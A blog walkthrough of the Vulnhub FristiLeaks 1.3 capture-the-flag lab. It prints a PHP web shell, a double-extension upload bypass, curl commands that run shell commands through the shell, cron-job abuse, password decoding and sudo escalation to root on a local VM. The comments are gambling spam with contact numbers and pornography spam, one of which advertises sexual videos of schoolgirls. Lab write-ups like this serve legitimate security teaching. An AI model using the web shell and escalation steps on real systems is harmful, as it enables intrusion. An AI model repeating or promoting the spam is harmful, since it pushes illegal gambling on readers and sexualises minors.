Saturday, 19 December 2015

[Vulnhub] Fristileaks: 1.3

Thanks Ar0xA for this "vuln"derful image.
This is my second completely self solved and first write up for vulnhub images. So cheers fellow #vulnhub fellas. \m/

Setup

 My (attacker) IP: 192.168.56.102  
 Vulnerable Image IP: 192.168.56.103  
 Software setup: Oracle VirtualBox on Kali 2.0  

Recon

Like any other challenge, we begin using our classic nmap -

 nmap -A -p- 192.168.56.103 -oA fristileaks  

With this we were able to enumerate the image and found out that only port 80 was open showing us -



However, the interesting part of this was the availability of robots.txt with 3 directories (/cola, /sisi, /beer), all of which had the same result - This is not the url you were looking for!

This was the guessing game part of vulnhub images, unlike my previous challenge, this time I thought I knew how most of my guesses required to be and viola, we got the right drink - fristi.

/fristi



Post this was the much obvious looking into the source code

 <meta name="description" content="super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it.">  
 <!--   
 TODO:  
 We need to clean this up for production. I left some junk in here to make testing easier.  
 - by eezeepz  
 -->  


At the bottom of the page we found small encoded snippet,
which much obviously directed us to this image.


 <!--   
 iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx  
 jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl  
 S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw  
 B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f  
 m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ  
 Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb  
 DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd  
 jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU  
 12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5  
 uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1  
 04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq  
 i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg  
 tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws  
 30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl  
 3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK  
 ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q  
 mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34  
 rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe  
 EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH  
 AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk  
 CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR  
 U5ErkJggg==  
 -->  






This leads us to 
By now we can all guess who the user is and what his password would be. 

/home/eezeepz

After logging in, the harder portion of the 4 hours started. We now find a file upload page.
From the enumeration, we knew the server was Apache 2.2.15 running with PHP 5.3.3.
This meant the most common config mistake to allow file upload to be x.php.png.
I quickly wrote a 5 line script and uploaded it on the server. 

 <?php  
 if(isset($_REQUEST['cmd'])){  
   $cmd = ($_REQUEST["cmd"]);  
   system($cmd);  
   echo "</pre>$cmd<pre>";  
   die;}  
 ?>  

The best way to get output from this shell is via curl -
 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=ls"  

/home/admin

Somehow I didn't mind this interface and didn't bother getting a reverse tcp connection until a later stage.
After this, I went through the regular techniques of traversing until.

 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat ../../../notes.txt"  
 hey eezeepz your homedir is a mess, go clean it up, just dont delete  
 the important stuff.  
 -jerry  
 </pre>cat ../../../notes.txt<pre>  


After going to /home/eezeepz and analyzing the contents, I got hold of
 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/eezeepz/notes.txt"  
 Yo EZ,  
 I made it possible for you to do some automated checks,   
 but I did only allow you access to /usr/bin/* system binaries. I did  
 however copy a few extra often needed commands to my   
 homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those  
 from /home/admin/  
 Don't forget to specify the full path for each binary!  
 Just put a file called "runthis" in /tmp/, each line one command. The   
 output goes to the file "cronresult" in /tmp/. It should   
 run every minute with my account privileges.  
 - Jerry  
 </pre>cat /home/eezeepz/notes.txt<pre>  



Trying to traverse into /home/admin/ gave me an *Permission Denied* Error. So going through last half of this message again, the path was pretty clear.
 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=echo 'chmod 777 /home/admin'>/tmp/runthis"  


Unfortunately, this attempt failed because we didn't read the entire message.
 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /tmp/cronresult"  
 command did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bin  

So retrying,
 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=echo '/home/admin/chmod 777 /home/admin'&gt;/tmp/runthis"  

We get,

 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /tmp/cronresult"  
 command did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bincommand did not start with /home/admin or /usr/bin  
 executing: /home/admin/chmod 777 /home/admin  

Aha. Now we could go into the /home/admin directory.

/home/fristigod

Analyzing the contents of this directory, we could see a few interesting files -

 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/admin/cryptedpass.txt"
 mVGZ3O3omkJLmy2pcuTq  
 </pre>cat /home/admin/cryptedpass.txt<pre>  

 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/admin/cryptpass.py" 
 #Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn<br />  
 import base64,codecs,sys  
 def encodeString(str):  
     base64string= base64.b64encode(str) 
     return codecs.encode(base64string[::-1], 'rot13')
 cryptoResult=encodeString(sys.argv[1])
 print cryptoResult
 </pre>cat /home/admin/cryptpass.py<pre> 
 
 $ curl http://192.168.56.103/fristi/uploads/shell.php.png -d"cmd=cat /home/admin/whoisyourgodnow.txt"  
 =RFn0AKnlMHMPIzpyuTI0ITG
 </pre>cat /home/admin/whoisyourgodnow.txt<pre>  

Quickly writing a decoding program (edited the same prog, hence no naming convention followed)

 $ cat decryptpass.py
 #!/usr/bin/python
 import base64,codecs,sys
 def encodeString(str):
     base64string = codecs.encode(str[::-1], 'rot13') //since English Language has 26 alphabets, we only need to do rot13 to get back the original 
     return base64.b64decode(base64string) // base64 decoding 
 cryptoResult=encodeString(sys.argv[1])
 print cryptoResult


So decrypting the results -

 $ python decryptpass.py mVGZ3O3omkJLmy2pcuTq
 thisisalsopw123
 $ python decryptpass.py =RFn0AKnlMHMPIzpyuTI0ITG
 LetThereBeFristi!


So now that we have two sets of passwords, we try them on the user accounts. On accessing the /home/ directory, we saw three user profiles - admin, ezzeepz and fristigod. The only major problem was for running a sudo command and elevate privileges, I would require a tty, for which I needed a stable reverse shell and not only a php web shell. After attempting to build a custom simple shell and failing muiltiple times (netcat and telnet were not there in the system so was trying to get a php or pyton reverse tcp connection), I just switched back to my script kiddie nature and used php-reverse-shell to get access into the machine.

/root/

Launching a tty to escalate privileges with sudo can be done with the python one liner (Thank you Pentest monkey, again)

 $ python -c 'import pty; pty.spawn("/bin/sh")'

After this I was able to figure out the credentials of admin(thisisalsopw123) and fristigod(LetThereBeFristi!).
My hope of Admin being the sudo user was thrashed and on running find / -perm -4000, I pretty much got the idea who the sudo user is (last line - find: `/var/fristigod': Permission denied).

After su fristigod, I ran  find / -perm -4000 to find

 /var/fristigod/.secret_admin_stuff/doCom

Unfortunately,
 bash-4.1$ ./var/fristigod/.secret_admin_stuff/doCom 
 ./var/fristigod/.secret_admin_stuff/doCom 
 Nice try, but wrong user ;) 

traversing into the directory, I figured doCom was accessible only via root perms, but the perms to this folder was given to fristigod. This was the obvious point of escalation. Hence I tried harder,

 bash-4.1$ sudo ./doCom  
 sudo ./doCom
 Sorry, user fristigod is not allowed to execute './doCom' as root on localhost.localdomain. 

This point I knew I had to run as a different user. On analyzing the /etc/passwd I saw a user named fristi. I knew this was the user. However, I still run 

 bash-4.1$ sudo -l
 sudo -l
 Matching Defaults entries for fristigod on this host:
  requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
  DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
  PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
  LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
  LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
  LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
  secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
 User fristigod may run the following commands on this host:
  (fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom   

This was the confirmation. The next command gave me access to this file

 bash-4.1$ sudo -u fristi ./doCom
 sudo -u fristi ./doCom
 Usage: ./program_name terminal_command ...

This was simple now,

 bash-4.1$ sudo -u fristi ./doCom /bin/bash
 sudo -u fristi ./doCom /bin/bash 
 bash-4.1# id  
 id
 uid=0(root) gid=100(users) groups=100(users),502(fristigod)

Pwn'd. Now for the flag -


 bash-4.1# cd /root  
 cd /root  
 bash-4.1# ls   
 ls  
 fristileaks_secrets.txt  
 bash-4.1# cat fristileaks_secrets.txt  
 cat fristileaks_secrets.txt  
 Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]  
 I wonder if you beat it in the maximum 4 hours it's supposed to take!  
 Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)  
 Flag: Y0u_kn0w_y0u_l0ve_fr1st1  

And w00t w00t! Fristileaks solved within 4 hours :)
Hope to continue pwn'ing such challenges from Vulnhub.

20 comments:

  1. Yuk Gabung di NAGAQQ: AGEN BANDARQ BANDARQ ONLINE ADUQ ONLINE DOMINOQQ TERBAIK

    Yang Merupakan Agen Bandarq, Domino 99, Dan Bandar Poker Online Terpercaya di asia hadir untuk anda semua dengan permainan permainan menarik dan bonus menarik untuk anda semua

    Bonus yang diberikan NagaQQ :
    * Bonus rollingan 0.5%,setiap senin di bagikannya
    * Bonus Refferal 10% + 10%,seumur hidup
    * Bonus Jackpot, yang dapat anda dapatkan dengan mudah
    * Minimal Depo 15.000
    * Minimal WD 20.000

    Memegang Gelar atau title sebagai Agen BandarQ Terbaik di masanya

    Games Yang di Hadirkan NagaQQ :
    * Poker Online
    * BandarQ
    * Domino99
    * Bandar Poker
    * Bandar66
    * Sakong
    * Capsa Susun
    * AduQ
    * Perang Bacarrat (New Game)

    Tersedia Deposit Via pulsa :
    Telkomsel & XL

    Info Lebih lanjut Kunjungi :
    Website : NagaQQ
    Facebook : NagaQQ Official
    Kontakk : Info NagaQQ
    linktree : Agen Judi Online
    WHATSAPP 1 : +855977509035
    Line : Cs_nagaQQ
    TELEGRAM : +855967014811


    BACA JUGA BLOGSPORT KAMI YANG LAIN:
    agen bandarq terbaik
    Winner NagaQQ
    Daftar NagaQQ
    Agen Poker Online

    ReplyDelete
  2. CrownQQ Agen DominoQQ BandarQ dan Domino99 Online Terbesar

    Yuk Buruan ikutan bermain di website CrownQQ
    Sekarang CROWNQQ Memiliki Game terbaru Dan Ternama loh...

    9 permainan :
    => Poker
    => Bandar Poker
    => Domino99
    => BandarQ
    => AduQ
    => Sakong
    => Capsa Susun
    => Bandar 66
    => Perang Baccarat (NEW GAME)

    => Bonus Refferal 20%
    => Bonus Turn Over 0,5%
    => Minimal Depo 20.000
    => Minimal WD 20.000
    => 100% Member Asli
    => Pelayanan DP & WD 24 jam
    => Livechat Kami 24 Jam Online
    => Bisa Dimainkan Di Hp Android0619679319
    => Di Layani Dengan 5 Bank Terbaik
    => 1 User ID 9 Permainan Menarik

    Ayo gabung sekarang juga hanya dengan
    mengklick Agen BandarQ

    Link Resmi CrownQQ:
    - idcrownqq.com
    - idcrownqq.net
    - idcrownqq.org
    - idcrownqq.info

    Info Lebih lanjut Kunjungi :
    Website : CrownQQ
    Daftar CrownQQ : Poker Online
    WHATSAPP : +855882357563
    Line : CS CROWNQQ
    Facebook : CrownQQ Official
    Kemenangan CrownQQ : Agen BandarQ

    ReplyDelete
  3. Join yuk di chanelku yang seger...
    banyak film terbaru loh...

    STREAMING NONTON BOKEP GRATIS
    Kumpulan BOKEP Terlengkap Terbaru Terpopuler & Ter-Update By SUKABOKEP

    SUKABOKEP

    BOKEP INDO NGENTOT ASIK

    BOKEP BARAT NGENTOT MANTAP

    BOKEP JEPANG NGENTOT NIKMAT

    BOKEP KOREA NGENTOT PUAS

    FILM SEMI NGENTOT SERU

    ReplyDelete
  4. KUMPULAN VIDEO BOKEP INDO, JEPANG, BARAT, ASIA, ABG SMP & SMA PECAH PERAWAN KORBAN PACAR MEMEK MULUS MASIH RAPET , DESAHAN KENIKMATAN TERBARU DAN TERUPDATE 2020 FREE DOWNLOAD

    BOKEP INDO

    BOKEP VIRAL

    ReplyDelete
  5. Nonton Film BOKEP Lengkap Nya Klik disini ↓↓↓↓↓↓
    VIDEO BOKEP
    BOKEP VIRAL

    Nonton Film INDOXXI Lengkap Nya Klik disini ↓↓↓↓↓↓
    BIOSKOP ONLINE

    ReplyDelete